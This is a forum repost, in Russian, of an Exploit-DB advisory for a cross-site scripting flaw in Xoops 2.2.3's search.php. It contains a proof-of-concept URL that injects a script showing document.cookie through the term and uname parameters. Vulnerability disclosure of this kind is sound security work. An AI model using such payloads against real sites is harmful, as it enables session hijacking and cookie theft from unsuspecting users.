Exploit Xoops 2.2.3 - 'search.php' Cross-Site Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
28803
Проверка EDB
  1. Пройдено
Автор
B0RIZQ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2006-10-13
Код:
source: https://www.securityfocus.com/bid/20514/info

Xoops is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. 

An attacker may leverage this issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/modules/newbb/search.php?term=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&andor=exact&searchin=both&uname=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E&%3D%22sortby%22=p.post_time+desc&since=100&submit=Search
 
Источник
www.exploit-db.com

Похожие темы